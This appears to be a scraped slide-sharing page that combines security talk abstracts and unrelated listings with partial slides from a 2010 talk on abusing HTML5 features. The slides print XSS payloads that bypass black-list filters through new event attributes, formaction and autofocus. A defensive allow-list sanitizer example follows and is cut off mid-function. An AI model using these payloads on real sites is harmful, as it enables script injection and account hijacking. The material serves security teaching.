The document discusses attacking websites using HTML5 features and capabilities. It introduces HTML5 and some of its new tags, attributes, and APIs that can be abused for attacks like cross-site scripting and bypassing input filters. Specific techniques demonstrated include bypassing blacklists using new HTML5 event attributes and tags, setting up reverse web shells using cross-origin requests, and clickjacking via the drag-and-drop API. The talk also covers poisoning the HTML5 application cache and exploiting client-side file includes through cross-origin XMLHttpRequests. Demo attacks are promised to illustrate these HTML5-based vulnerabilities.
The objective of this talk is to demonstrate how to subvert some SQLi (bad but popular) defenses and to show how to properly defend against SQLi attacks.
We will cover topics such as:
- Blind SQLi attacks
- Timing SQLi attacks
- Encoding attacks
- How to subvert some filters
- How you should protect your code against SQLi attacks
Presented at Confraria Security & IT, 26/01/11 Lisbon
note: this is exactly the same talk as given in Codebits IV (2010), without the Codebits CTF qualifier explanation.
This talk was co-presented by me and Nuno Loureiro (http://www.slideshare.net/nuno.loureiro)
In this talk I will present a brief introduction to Code Review, where we will try to understand its value and why it is so hard to implement effectively. I will also present some of the challenges we had at SAPO and how we tried to fix them.
Running security tests as a part of your CI pipeline allows you to provide better and more relevant feedback to developers as quickly as possible (also known as the “Shift Left paradigm”/”DevSecOps” methodology).
Those slides are from a session at DevOpsDays TLV 2017 - how to use OWASP ZAP to create valuable dynamic security tests. In those slides, I show how we added those tests to one of our open source projects - Tweek (https://github.com/soluto/tweek)
DevOops Redux - Ken Johnson, Chris Gates - AppSec USA 2016 - Chris Gates
In a follow-up to the duo’s offensive focused talk “DevOops, How I hacked you”, they discuss defensive countermeasures and real experiences in preventing attacks that target flaws in your DevOps environments. In this talk, Chris and Ken describe common ways in which DevOps environments fall prey to malicious actors with a focus on preventative steps. The team will present their recommended approach to hardening for teams using AWS, Continuous Integration, GitHub, and common DevOps tools and processes. More specifically, the following items will be demonstrated:
- AWS Hardening
- AWS Monitoring
- AWS Disaster Recovery
- GitHub Monitoring
- OPINT
- Software Development Practices/Processes
- Secure use of Jenkins/Hudson
- Developer laptop hardening (OS X)
Security DevOps - How to stay secure in agile projects anyway // DevO... - Christian Schneider
This session shows you which automation options exist for monitoring specific security aspects in agile software development. Starting from the established DevOps concept, in which the processes at the transition from development to operations are automated and interlocked, "Security-DevOps" picks up this impetus and transfers it to hardening applications against hacker attacks. By feeding security findings back to development early as part of the automation, your pentesters get the opportunity to concentrate on the trickier security checks, despite the short release cycles demanded.
Attacking and Defending Mobile Applications - Jerod Brennen
The rapid increase in mobile technology adoption in the workplace has resulted in a rise in mobile application attacks. This presentation provides attendees with insight into how mobile application attacks are perpetrated, as well as how we can develop to defend against them.
Sanoop Thomas & Samandeep Singh
Burp Suite is the de-facto proxy application for web security testers. This hands-on workshop will explore the different capabilities of the Burp proxy application and also dive into the extensions and tooling options to perform improved application security test cases.
The workshop will start with a quick overview of Burp usage, different settings, features and some commonly useful extensions, and then explore deeply into its extension APIs to build your own custom extensions. We will provide a suitable development environment on the Java and Python platforms. This will be a hands-on workshop, and participants will learn how to automate different application security test scenarios and build Burp extensions with the help of templates.
Security DevOps: How to stay secure in agile projects anyway // JAX 2015 - Christian Schneider
This session shows you which automation options exist for monitoring specific security aspects in agile software development. Starting from the established DevOps concept, in which the processes at the transition from development to operations are automated and interlocked, "Security-DevOps" picks up this impetus and transfers it to hardening applications against hacker attacks.
Security DevOps - Free pentesters' time to focus on high-hanging fruits // Ha... - Christian Schneider
In this session I will present best practices of how open source tools (used in the DevOps and security communities) can be properly chained together to form a framework that can - as part of an agile software development CI chain - perform automated checking of certain security aspects. This does not remove the requirement for manual pentests, but tries to automate early security feedback to developers. Ultimately the aim is to free pentesters' time by continuously reducing the amount of recurring (easy to find) default findings, so that pentesters can use that time to focus on the really high-hanging fruits.
Based on my experience of applying SecDevOps techniques to projects, I will present the glue steps required on every commit and at nightly builds to achieve different levels of depth in automated security testing during the CI workflow.
I will conclude with a "SecDevOps Maturity Model" of different stages of automated security testing and present concrete examples of how to achieve each stage with open source security tools.
Projects Valhalla and Loom at IT Tage 2021 - Vadym Kazulkin
In this presentation, we will explain the motivation, added values, challenges and current status of the Valhalla and Loom projects.
In the Valhalla project, Inline Type is introduced in Java. An Inline Type is an immutable type that differs only by the state of its properties. The purpose is to reduce memory consumption and access times for such data types. Also, as part of this project, the Java type system will be unified so that Java becomes a pure object-oriented programming language.
In the Loom project, lightweight threads are implemented in Java. The purpose is to no longer trade off between simplicity and scalability of the source code and to reconcile both.
This presentation explains how to perform security testing using ZAP in Salesforce. Learn how to install and configure ZAP to automate security testing!
Slides from my talk - Essential security measures in ASP.NET MVC. More info at https://hryniewski.net/essential-security-measures-in-asp-net-mvc-resources-for-talk/
How can you authenticate without authentication? Is there another way to perform authentication?
Those are the slides for a talk I gave at OWASP AppSec Israel.
Introduction to Web Application Penetration Testing - Rana Khalil
Intro to web application penetration testing workshop I held in Atlanta as part of the AnitaBorg Cybersecurity Weekend on Aug. 19. The link for the event can be found here: https://community.anitab.org/event/atl-cybersecurity-day-two/
OWASP London - So you thought you were safe using AngularJS.. Think again! - Lewis Ardern
OWASP London talk on AngularJS Security, video here: https://www.youtube.com/watch?v=DcpD5Wh4uOQ&feature=youtu.be&t=4244
Similar talk presented at FluentConf San Jose - https://www.slideshare.net/LewisArdern/so-you-thought-you-were-safe-using-angularjs-think-again
So you have deployed your web app to Azure. Now, how do you make it more secure and compliant?
In this fast-paced talk we will run through an overview of some of the Azure technologies that you can use to better protect your web applications in Azure - all depending on your required security level, of course. The talk will set out a framework for you to consider which protections you want to put in place and provide you with the awareness of the tools at your disposal.
https://www.lytzen.name/talks/Securing_web_apps_in_azure.html
Oltersdorf Realty Home Buying Presentation, Leelanau, Grand Traverse, Travers... - Oltersdorf Realty, LLC
Please take a moment to browse our detailed guide for homebuyers geared especially towards first time home buyers in the Traverse City region (Leelanau and Grand Traverse County). The combination of decreased home values, low interest rates, and federal incentives make this a very attractive time to purchase your first home or to be a move up buyer. Topics covered include: The current Traverse City real estate market, the buying process, buy vs. rent, tax incentives, home buyer credit, finding an agent, securing a loan, and protecting your investment. Please visit http://www.oltersdorf.com for additional information!
Snapshots taken from the internet to underscore the need to give to your favourite charitable institution to help the Haitian people. They need your help.
And what are you waiting for to become part of our team?
Visit the site, see the project we are developing, and don't waste time: sign up today.
http://diamantenobre.com.br/eternyon/grupoeternyontop/
Estou Jogando for companies in the Brazilian games market - Cayo Medeiros
Presentation of Estou Jogando for companies that operate in the Brazilian games market or are interested in that market.
If you are a company in the Brazilian games market and want to get straight to the point, or are in a hurry, skip to slide 20!
This project is useful because it is aimed at:
activating students' research skills and building their information culture;
developing the ability to model situations;
gaining experience in conducting dialogue and discussions;
introducing students to creative activity;
increasing interest in the subject.
HTML5 introduces significant changes for today's websites: new and updated tags, new functionality, better error handling and an improved Document Object Model (DOM). However, the new HTML5 features come with new (application) security vulnerabilities. This presentation reviews the new attack vectors, the associated risks and what needs to be taken into consideration when implementing HTML5.
Top 10 HTML5 Features for Oracle Cloud Developers - Brian Huff
Whether you are using Mobile, Social, Java, or Sites in the cloud, HTML5 is probably the easiest way to create and maintain web applications. Most of the Oracle cloud supports HTML5, so it is important to understand what powerful new features are built into this platform.
Top Ten Proactive Web Security Controls v5 - Jim Manico
It is not easy to build a secure, low-risk or risk-managed web application. Firewalls, “policy” and other traditional information security measures serve as either an incomplete or useless measure in the pursuit of web application security.
As software developers author the code that makes up a web application, they need to do so in a secure manner. All tiers of a web application, the user interface, the business logic, the controller, the database code and more – all need to be developed with security in mind. This can be a very difficult task and developers are often set up for failure. Most developers did not learn about secure coding or crypto in school. The languages and frameworks that developers use to build web applications are often lacking critical core controls or are insecure by default in some way. There may be inherent flaws in requirements and designs. It is also very rare when organizations provide developers with prescriptive requirements that guide them down the path of secure software. When it comes to web security, developers are often set up to lose the security game.
This document was written by developers for developers, to assist those new to secure development. It aims to guide developers and other software development professionals down the path of secure web application software development.
This document is neither scientific nor complete. In fact it is a bit misguided. There are more than 10 issues that developers need to be aware of. Some of these “top ten” controls will be very specific, others will be general categories. Some of these items are technical, others are process based. Some may argue that this document includes items that are not even controls at all. All of these concerns are fair. Again, this is an awareness document meant for those new to secure software development. It is a start, not an end.
video demos: http://whitehatsec.com/home/assets/videos/Top10WebHacks_Webinar031711.zip
Many notable and new Web hacking techniques were revealed in 2010. During this presentation, Jeremiah Grossman will describe the technical details of the top hacks from 2010, as well as some of the prevalent security issues emerging in 2011. Attendees will be treated to a step-by-step guided tour of the newest threats targeting today's corporate websites and enterprise users.
The top attacks in 2010 include:
• 'Padding Oracle' Crypto Attack
• Evercookie
• Hacking Auto-Complete
• Attacking HTTPS with Cache Injection
• Bypassing CSRF protections with ClickJacking and HTTP Parameter Pollution
• Universal XSS in IE8
• HTTP POST DoS
• JavaSnoop
• CSS History Hack In Firefox Without JavaScript for Intranet Portscanning
• Java Applet DNS Rebinding
Mr. Grossman will then briefly identify real-world examples of each of these vulnerabilities in action, outlining how the issue occurs, and what preventative measures can be taken. With that knowledge, he will strategize what defensive solutions will have the most impact.
Browser Hacking For Fun and Profit | Null Bangalore Meetup 2019 | Divyanshu S... - Divyanshu
Browser exploitation | Reporting vulnerabilities in top browsers and finding CVEs.
Session in Null Bangalore Meet 23 November 2019 Null/OWASP/G4H combined meetup
Thanks to respective researchers for their work.
Summarising Snowden and Snowden as internal threat - ClubHack
A quick look back at Snowden's revelations, and also looking at Snowden as an insider threat.
*This presentation ends abruptly because during the talk it ends as food for thought and a kickstart for the next session*
Fatcat Automatic Web SQL Injector by Sandeep Kamble - ClubHack
What is the FatCat SQL injector: This is an automatic SQL injection tool called FatCat.
FatCat purpose: For testing your web application and exploiting your application more deeply.
FatCat support:
1) MySQL 5.0
FatCat features:
- Union-based SQL injection
- Error-based SQL injection
- ModSecurity bypass (WAF)
The Difference Between the Reality and Feeling of Security by Thomas Kurian - ClubHack
The paper shall focus on the following:
1) Introduction to the problem: Focus on “security awareness”, not “behavior”
2) Real-life case study of why a US$100,000 “security awareness” project failed
a. Identifying the human component in information security risks
b. Addressing the human component using “awareness” and “behavior” strategies
4) Sample real-life case studies where quantifiable change has been observed
Original research and publications
The talk is modeled on the methodology HIMIS (Human Impact Management for Information Security) authored by Anup Narayanan and published under “Creative Commons,
Stand Close to Me & You're pwned! Owning Smart Phones using NFC by Aditya Gup... - ClubHack
NFC, or Near Field Communication, allows cell phones to perform specified actions whenever they detect NFC tags or signals from another NFC-enabled device. Most recent phones, including the Samsung Galaxy S3, Nokia Lumia 610, Blackberry Bold etc., have NFC enabled. NFC even helps enterprise/payment gateways to ease users' actions, such as connecting to a wifi, setting a bookmark, making payments etc.
Gone are the days of sending Android malware links through URLs or attachments. In this talk, we will be showing how an attacker could steal private and sensitive information from one's phone and even perform malicious actions on a user's phone, using NFC as an attack vector. NFC attack vectors come in two forms: Active (setting the attacker's phone as a proxy between the victim's smartphone and the payment terminal) and Passive (using NFC tags). For our demonstrations, we would be creating malicious NFC tags which, when detected by any NFC-enabled smartphone, would steal sensitive information from the phone (without the user's knowledge) as well as trick the user into installing malicious applications on his phone. Thereafter, we would also be talking about how an attacker could get in close proximity to another NFC-enabled phone, get a remote shell on the victim's phone and compromise the phone's security. We would also be discussing how viral an NFC attack could go in future, if proper security measures are not enforced.
Smart grids add communication capabilities and intelligence to traditional grids. Smart grids are enabled by:
- intelligent sensors and actuators
- extended data management systems
- expanded two-way communication between utility operation system facilities and customers
- network security
- national integration
- self-healing and adaptive operation - improved distribution and transmission system operation
- allowing customers the freedom to purchase power based on dynamic pricing
- improved quality of power, with less wastage
- integration of a large variety of generation options
We have seen that the more complex and critical the infrastructure, the more vulnerable it is. Since the year 1994 we have seen lots of incidents where smart grids were hacked; the latest and booming incident was the Stuxnet worm, which targeted the nuclear power system of Iran and worldwide. We will see the different types of attacks, and the security needed for the smart grid.
Legal Nuances to the Cloud by Ritambhara Agrawal - ClubHack
This presentation highlights the key legal risks and their implications in cloud computing. Cloud is inherently multi-jurisdictional, encompassing, remote hosting and processing of the data. This gives rise to multiple legal issues including security and privacy of the data, IP Rights, data portability, contractual limitations, risk mitigation and jurisdictional disputes.
As the cloud involves remote hosting and data accessibility by multiple parties, security and privacy remains the biggest concern for the companies. Businesses should look at issues ranging from physical location of the data centers, protection of the data against any adversity and intrusion, and access rights management.
The cloud servers are often located in different countries, which results in trans-border data flow. Each country has its own set of legal rules and regulations regarding data protection and privacy policies, and these can bring in complications in the form of conflicting laws and jurisdictional disputes. Issues pertaining to IP rights, trade secrets and ownership of the data placed in the cloud require utmost attention. Termination and exit clauses are critical to contracts in the cloud. Interoperability of the data in the event of termination of a vendor's services is an important aspect to be considered in the contracts.
Infrastructure Security by Sivamurthy Hiremath - ClubHack
With the development of technology, the interdependence of various infrastructures has increased, which has also enhanced their vulnerabilities. National Information Infrastructure security concerns the nation's stability and economic security. So far, research in Internet security has primarily focused on securing the information rather than securing the infrastructure itself.
Given the pervasive and ubiquitous nature of the Internet, coupled with growing concerns about cyber attacks, we need immediate solutions for securing the Internet infrastructure. Given the prevailing threat situation, there is a compelling need to develop hardware redesign architectures, algorithms and protocols to realize a dependable Internet infrastructure. In order to achieve this goal, the first and foremost step is to develop a comprehensive understanding of the security threats and existing solutions. This talk attempts to fulfil this important step by providing a classification of security attacks into four main categories: DNS hacking, routing table poisoning, packet mistreatment, and Denial-of-Service attacks. We generally discuss the existing infrastructure solutions for each of these categories, and also outline a methodology for developing a secured nation.
Hybrid Analyzer for Web Application Security (HAWAS) by Lavakumar Kuppan - ClubHack
Today there is a flood of tools to help with the automation of active scanning and exploitation of web applications. Once you move beyond these two functions the flood reduces down to a trickle. Vulnerability hunting is a fine art that requires a knack for seeing hidden patterns and connections. Tests like hidden parameters guessing are seldom performed by even skilled testers because of the time and effort involved in preparing for and performing them. When was the last time you identified a piece of sensitive data hidden in plain sight because it was hex encoded in to a very inconsequential looking string?
Do you enumerate all possible avenues for stored XSS in an application? A lot of times checks are missed because there is no good tooling available to perform them effectively and efficiently. HAWAS is the tool you have been missing for a long time now. It is an open source tool that is designed for hybrid analysis. It performs automated passive analysis of a web application with no input from the user for some cases and with specific application specific input for some other cases. Based on the initial set of findings the user can perform further checks from within HAWAS. HAWAS will help you hugely increase your test coverage with very little additional effort.
Hacking and Securing iOS Applications by Satish Bomisstty - ClubHack
iOS applications share a common set of classes and depend heavily on the operating system's solutions for data communication, storage and encryption. Depending solely on the Apple implementation makes them less complex, but it affects the security of the applications. Though iOS comes with a great set of security features like code signing, ASLR, DEP, sandboxing and Data Protection, all of them are subject to attack. Relying only on iOS security could lead to the demise of the sensitive data stored within the application when iOS is compromised. Application security can be improved by understanding the weaknesses in the current implementation and incorporating your own code that works better.
The presentation illustrates several types of iOS application attacks like run time manipulation, custom code injection, SSL session hijacking and forensic data leakage. It gives an insight into the iOS Keychain & data protection API and explains the techniques to circumvent it. The presentation will provide guidelines and suggests best practices for secure iOS application development.
Critical Infrastructure Security by Subodh Belgi - ClubHack
Industrial Automation & Control Systems are an integral part of various manufacturing & process industries as well as national critical infrastructure. Concerns regarding cyber-security of control systems are related to both the legacy nature of some of the systems as well as the growing trend to connect industrial control systems to corporate networks. These concerns have led to a number of identified vulnerabilities and have introduced new categories of threats that have not been seen before in the industrial control systems domain. Many of the legacy systems may not have appropriate security capabilities that can defend against modern day threats, and the requirements for availability and performance can preclude using contemporary cyber-security solutions. To address cyber-security issues for industrial control systems, a clear understanding of the security challenges and specific defensive countermeasures is required. The session will highlight some of the latest cyber security risks faced by industrial automation and control systems along with essential security controls & countermeasures.
Content Type Attack: Dark Hole in the Secure Environment by Raman Gupta (ClubHack)
With the increase in security awareness it is very difficult to compromise a network or workstation: most network administrators apply a very restrictive firewall policy for incoming network traffic, i.e. they allow only traffic for the http/https service, and antivirus software can easily detect any virus- or worm-infected file. This talk is about the content type attack, which cannot be blocked at the network perimeter/firewall and is undetectable by antivirus. The discussion also includes a demonstration of the attack vector used to compromise the system. Finally, it includes an analysis of the malicious file used to compromise the system.
Abstract of the paper: Cross-site scripting (XSS) attacks are considered one of the most dangerous attacks. When an application accepts unvalidated user input and sends it back to the browser without validation, it provides attackers with an opportunity to execute malicious scripts in victim users' browsers. By using this attack vector, malicious users can hijack user accounts, deface websites, carry out phishing attacks, etc. XSS Shell is a cross-domain tool to carry out XSS attacks in a more controlled manner. It is used to set up a channel between the attacker and the victim's browser and to control the victim's browser.
It gives me immense pleasure to tell you that from 06-02-10 to 06-02-12 our magazine has completed two successful and rejoicing years. We at ClubHack are super excited! I hope you people are enjoying the magazine and will continue to do so in the coming future too. We enjoy making this for you all. It is said that "A lot can happen over a cup of coffee". We experienced this amazing moment over a cup of coffee when we had the idea of starting a hacking magazine, and now it has come all this way... :). 2 years look small when we look back. For this incredible success we at ClubHack would like to thank all our readers, volunteers and authors for giving us such unbelievable support. As we want to keep up the growth and progress, we request you all to keep throwing in articles, suggestions, support and your love!
Coming to this issue, we have Network Security in Tool Gyan, which will shed light on how to set up a secured network; Who Wants to Be a Millionaire in Tool Gyan, check it out yourself to see what exactly it's all about ;); and TOR in Mom's Guide for all those who thought 'It sounds very complicated to use, I'm not a hacker! I can't use it!' by our author Federico from Italy.
From this month's issue we plan to start a new section on secure coding. This section will essentially focus on good coding practices and snippets to mitigate various vulnerabilities. To begin with, we have an article on the PHP-based RFI/LFI vulnerability. I hope you will like reading it. We also have some cool articles on XSS attacks, ROT decoding and the Matriux section.
Do send us your feedback at abhijeet@chmag.in; this will help us improve further.
We are now in the middle of 2012. As predicted by many techno geeks, this year is phenomenal for IT-related technologies including security, networking and web technologies. In April a cloud war started between two big rivals, Microsoft & Google, both making sure that it's going to be secure and useful for smartphone users as well. With the introduction of such new technologies we must ensure security over the web. Here HTTPS comes into the picture, and we brought this topic into CHMag's Mom's Guide. Along with it, topics like Steganography (Tech Gyan), a new toolkit, Kautilya (Tool Gyan), and preventing SQL injections (Code Gyan) are covered.
If you have a good write-up on a topic that you think people should know about, then please share it with CHMag. Also, if you have suggestions, feedback & articles, send them to info@chmag.in. Keep reading!!
There was a time when mobile phones were the size of a shoe and had no features other than calling and SMS, and at that time I used to play the game Snake on my dad's phone :p Now, as time has passed, we have reached the age of smartphones, which are capable of doing lots of stuff, and the world wide web of applications is causing serious concern, as an attacker can use this platform to steal data. This issue of CHMag is dedicated to Mobile/Telecom Hacking and Security.
The cover page of this December issue was released at ClubHack 2011, India's pioneer international hacking conference, held last week. Talking about the ClubHack conference, if you missed ClubHack, the presentations are available at http://www.slideshare.net/clubhack and the videos at http://www.clubhack.tv/event/2011/
We recently released CHMag's Collector's Edition Volume II. If you wish to buy the Collector's Editions (vol1 - from issue 1 to 10 & vol2 - from issue 11 to 20), please write back to us: info@chmag.in. As of now it's on-demand printing.
Like the game Snake, I have played lots of other games too, which are reflected in the previous cover pages I have designed, and yes, I promise another awesome cover page based on a game on the theme of Android security, which will be the theme for an upcoming issue, for which send in your articles to info@chmag.in
Maruthi Prithivirajan, Head of ASEAN & IN Solution Architecture, Neo4j
Get an inside look at the latest Neo4j innovations that enable relationship-driven intelligence at scale. Learn more about the newest cloud integrations and product enhancements that make Neo4j an essential choice for developers building apps with interconnected data and generative AI.
Encryption in Microsoft 365 - ExpertsLive Netherlands 2024 (Albert Hoitingh)
In this session I delve into the encryption technology used in Microsoft 365 and Microsoft Purview. Including the concepts of Customer Key and Double Key Encryption.
Goodbye Windows 11: Make Way for Nitrux Linux 3.5.0! (SOFTTECHHUB)
As the digital landscape continually evolves, operating systems play a critical role in shaping user experiences and productivity. The launch of Nitrux Linux 3.5.0 marks a significant milestone, offering a robust alternative to traditional systems such as Windows 11. This article delves into the essence of Nitrux Linux 3.5.0, exploring its unique features, advantages, and how it stands as a compelling choice for both casual users and tech enthusiasts.
UiPath Test Automation using UiPath Test Suite series, part 5 (DianaGray10)
Welcome to UiPath Test Automation using UiPath Test Suite series part 5. In this session, we will cover CI/CD with devops.
Topics covered:
CI/CD with in UiPath
End-to-end overview of CI/CD pipeline with Azure devops
Speaker:
Lyndsey Byblow, Test Suite Sales Engineer @ UiPath, Inc.
UiPath Test Automation using UiPath Test Suite series, part 6 (DianaGray10)
Welcome to UiPath Test Automation using UiPath Test Suite series part 6. In this session, we will cover Test Automation with generative AI and Open AI.
UiPath Test Automation with generative AI and Open AI webinar offers an in-depth exploration of leveraging cutting-edge technologies for test automation within the UiPath platform. Attendees will delve into the integration of generative AI, a test automation solution, with Open AI advanced natural language processing capabilities.
Throughout the session, participants will discover how this synergy empowers testers to automate repetitive tasks, enhance testing accuracy, and expedite the software testing life cycle. Topics covered include the seamless integration process, practical use cases, and the benefits of harnessing AI-driven automation for UiPath testing initiatives. By attending this webinar, testers, and automation professionals can gain valuable insights into harnessing the power of AI to optimize their test automation workflows within the UiPath ecosystem, ultimately driving efficiency and quality in software development processes.
What will you get from this session?
1. Insights into integrating generative AI.
2. Understanding how this integration enhances test automation within the UiPath platform
3. Practical demonstrations
4. Exploration of real-world use cases illustrating the benefits of AI-driven test automation for UiPath
Topics covered:
What is generative AI
Test Automation with generative AI and Open AI.
UiPath integration with generative AI
Speaker:
Deepak Rai, Automation Practice Lead, Boundaryless Group and UiPath MVP
Dr. Sean Tan, Head of Data Science, Changi Airport Group
Discover how Changi Airport Group (CAG) leverages graph technologies and generative AI to revolutionize their search capabilities. This session delves into the unique search needs of CAG’s diverse passengers and customers, showcasing how graph data structures enhance the accuracy and relevance of AI-generated search results, mitigating the risk of “hallucinations” and improving the overall customer journey.
Essentials of Automations: The Art of Triggers and Actions in FME (Safe Software)
In this second installment of our Essentials of Automations webinar series, we’ll explore the landscape of triggers and actions, guiding you through the nuances of authoring and adapting workspaces for seamless automations. Gain an understanding of the full spectrum of triggers and actions available in FME, empowering you to enhance your workspaces for efficient automation.
We’ll kick things off by showcasing the most commonly used event-based triggers, introducing you to various automation workflows like manual triggers, schedules, directory watchers, and more. Plus, see how these elements play out in real scenarios.
Whether you’re tweaking your current setup or building from the ground up, this session will arm you with the tools and insights needed to transform your FME usage into a powerhouse of productivity. Join us to discover effective strategies that simplify complex processes, enhancing your productivity and transforming your data management practices with FME. Let’s turn complexity into clarity and make your workspaces work wonders!
GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo... (James Anderson)
Effective Application Security in Software Delivery lifecycle using Deployment Firewall and DBOM
The modern software delivery process (or the CI/CD process) includes many tools, distributed teams, open-source code, and cloud platforms. Constant focus on speed to release software to market, along with the traditional slow and manual security checks has caused gaps in continuous security as an important piece in the software supply chain. Today organizations feel more susceptible to external and internal cyber threats due to the vast attack surface in their applications supply chain and the lack of end-to-end governance and risk management.
The software team must secure its software delivery process to avoid vulnerability and security breaches. This needs to be achieved with existing tool chains and without extensive rework of the delivery processes. This talk will present strategies and techniques for providing visibility into the true risk of the existing vulnerabilities, preventing the introduction of security issues in the software, resolving vulnerabilities in production environments quickly, and capturing the deployment bill of materials (DBOM).
Speakers:
Bob Boule
Robert Boule is a technology enthusiast with PASSION for technology and making things work along with a knack for helping others understand how things work. He comes with around 20 years of solution engineering experience in application security, software continuous delivery, and SaaS platforms. He is known for his dynamic presentations in CI/CD and application security integrated in software delivery lifecycle.
Gopinath Rebala
Gopinath Rebala is the CTO of OpsMx, where he has overall responsibility for the machine learning and data processing architectures for Secure Software Delivery. Gopi also has a strong connection with our customers, leading design and architecture for strategic implementations. Gopi is a frequent speaker and well-known leader in continuous delivery and integrating security into software delivery.
Enhancing adoption of Open Source Libraries. A case study on Albumentations.AI (Vladimir Iglovikov, Ph.D.)
Presented by Vladimir Iglovikov:
- https://www.linkedin.com/in/iglovikov/
- https://x.com/viglovikov
- https://www.instagram.com/ternaus/
This presentation delves into the journey of Albumentations.ai, a highly successful open-source library for data augmentation.
Created out of a necessity for superior performance in Kaggle competitions, Albumentations has grown to become a widely used tool among data scientists and machine learning practitioners.
This case study covers various aspects, including:
People: The contributors and community that have supported Albumentations.
Metrics: The success indicators such as downloads, daily active users, GitHub stars, and financial contributions.
Challenges: The hurdles in monetizing open-source projects and measuring user engagement.
Development Practices: Best practices for creating, maintaining, and scaling open-source libraries, including code hygiene, CI/CD, and fast iteration.
Community Building: Strategies for making adoption easy, iterating quickly, and fostering a vibrant, engaged community.
Marketing: Both online and offline marketing tactics, focusing on real, impactful interactions and collaborations.
Mental Health: Maintaining balance and not feeling pressured by user demands.
Key insights include the importance of automation, making the adoption process seamless, and leveraging offline interactions for marketing. The presentation also emphasizes the need for continuous small improvements and building a friendly, inclusive community that contributes to the project's growth.
Vladimir Iglovikov brings his extensive experience as a Kaggle Grandmaster, ex-Staff ML Engineer at Lyft, sharing valuable lessons and practical advice for anyone looking to enhance the adoption of their open-source projects.
Explore more about Albumentations and join the community at:
GitHub: https://github.com/albumentations-team/albumentations
Website: https://albumentations.ai/
LinkedIn: https://www.linkedin.com/company/100504475
Twitter: https://x.com/albumentations
Pushing the limits of ePRTC: 100ns holdover for 100 days (Adtran)
At WSTS 2024, Alon Stern explored the topic of parametric holdover and explained how recent research findings can be implemented in real-world PNT networks to achieve 100 nanoseconds of accuracy for up to 100 days.
Observability Concepts EVERY Developer Should Know -- DeveloperWeek Europe.pdf (Paige Cruz)
Monitoring and observability aren’t traditionally found in software curriculums and many of us cobble this knowledge together from whatever vendor or ecosystem we were first introduced to and whatever is a part of your current company’s observability stack.
While the dev and ops silo continues to crumble, many organizations still relegate monitoring & observability to the purview of ops, infra and SRE teams. This is a mistake: achieving a highly observable system requires collaboration up and down the stack.
I, a former op, would like to extend an invitation to all application developers to join the observability party, and will share these foundational concepts to build on:
Climate Impact of Software Testing at Nordic Testing Days (Kari Kakkonen)
My slides at Nordic Testing Days 6.6.2024
The climate impact / sustainability of software testing is discussed in the talk. ICT and testing must carry their part of global responsibility to help with climate warming. We can minimize the carbon footprint, but we can also have a carbon handprint, a positive impact on the climate. Quality characteristics can be extended with sustainability, and then measured continuously. Test environments can be used less, at a smaller scale and on demand. Test techniques can be used to optimize or minimize the number of tests. Test automation can be used to speed up testing.
Unlock the Future of Search with MongoDB Atlas_ Vector Search Unleashed.pdf (Malak Abu Hammad)
Discover how MongoDB Atlas and vector search technology can revolutionize your application's search capabilities. This comprehensive presentation covers:
* What is Vector Search?
* Importance and benefits of vector search
* Practical use cases across various industries
* Step-by-step implementation guide
* Live demos with code snippets
* Enhancing LLM capabilities with vector search
* Best practices and optimization strategies
Perfect for developers, AI enthusiasts, and tech leaders. Learn how to leverage MongoDB Atlas to deliver highly relevant, context-aware search results, transforming your data retrieval process. Stay ahead in tech innovation and maximize the potential of your applications.
#MongoDB #VectorSearch #AI #SemanticSearch #TechInnovation #DataScience #LLM #MachineLearning #SearchTechnology
5. What is HTML5
• Next major version of HTML
• Adds new tags, event handlers to HTML
• Adds new APIs to call from JavaScript
• Native support for features currently provided by plug-ins like Flash/Silverlight/Java
ATTACK & DEFENSE
ClubHack 2010 5 labs
7. Is HTML5 hopelessly insecure?
• Short answer - NO.
• Long answer
– Security has been a major consideration in the design of the specification
– But it is incredibly hard to add features in any technology without increasing the possibility of abuse
This talk is about the abuse of some of HTML5's features
8. HTML5 Features featured in this talk
• New Tags and Attributes
• Cross Origin Requests
• Drag-n-Drop API
• Application Cache
• WebSockets
• WebWorkers
10. Black-list XSS filters
• Filters are a popular way to prevent XSS attacks when encoding is not possible - accepting rich content from users
• White-list filters like AntiSamy exist for this reason
• But developers like developing... custom filters
• Almost all these filters are black-list based
• Of course we know that black-list filters fail
• But 'we' are only about 0.1% of the web community
12. Bypassing Black-list filters with HTML5 - 2
• Filter blocks '<' and '>', so tags cannot be injected
• But user input is being injected inside an element's attribute ☺
• Filter also blocks event attributes like onerror, onload etc.
• HTML5 adds new event attributes - filter bypass ☺
Eg:
<form id=test onforminput=alert(1)> <input> </form>
<button form=test onformchange=alert(2)>X
13. Bypassing Black-list filters with HTML5 - 3
• Similar to case 2
• But the filter is blocking event attributes with the regex 'on\w+='
• This blocks the HTML5 attributes shown earlier
• HTML5's 'formaction' attribute can bypass this filter ☺
Eg:
<form id="test" /><button form="test" formaction="javascript:alert(1)">X
14. Self-triggering XSS exploits with HTML5
• A common XSS occurrence is injection inside some attribute of INPUT tags.
• Current techniques require user interaction to trigger this XSS
<input type="text" value="->Injecting here" onmouseover="alert('Injected val')">
• HTML5 turns this into a self-triggering XSS
<input type="text" value="-->Injecting here" onfocus="alert('Injected value')" autofocus>
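All three bypasses above (slides 12, 13 and 14) work because the filter enumerates what to block and HTML5 keeps adding attributes it never heard of. The following is an added example, not code from the slides or from the speaker's tools: `blacklistRejects` models the slide 13 regex, and `sanitizeStartTag` is the allow-list alternative that keeps only named attributes on named elements, so `formaction`, `autofocus` and every `on*` handler are dropped without being listed. The element and attribute allow-list, the `https://example.invalid/` base used to resolve relative URLs and the sample tags are constructed for illustration.

```javascript
// Added example (constructed; not from the slides): a black-list check modelled
// on slide 13 beside an allow-list attribute sanitizer.

// Slide 13's filter: drop anything matching on\w+= (onerror=, onforminput=, ...).
const EVENT_ATTR_BLACKLIST = /on\w+=/i;

function blacklistRejects(attrName, attrValue) {
  return EVENT_ATTR_BLACKLIST.test(`${attrName}=${attrValue}`);
}

// Allow-list: per element, the only attributes that may survive. Everything
// else (event handlers, form, formaction, autofocus, ...) is dropped, and
// elements not listed here (button, input, form, script, ...) are removed.
const ALLOWED = {
  a: new Set(['href', 'title']),
  img: new Set(['src', 'alt', 'width', 'height']),
  b: new Set(), i: new Set(), p: new Set(), br: new Set(),
};
const URL_ATTRS = new Set(['href', 'src']);
const RESOLVE_BASE = 'https://example.invalid/'; // constructed base for relative URLs

// URL-bearing attributes may only point at http(s); javascript:, data:, vbscript: go.
function safeUrl(value) {
  try {
    const u = new URL(value, RESOLVE_BASE);
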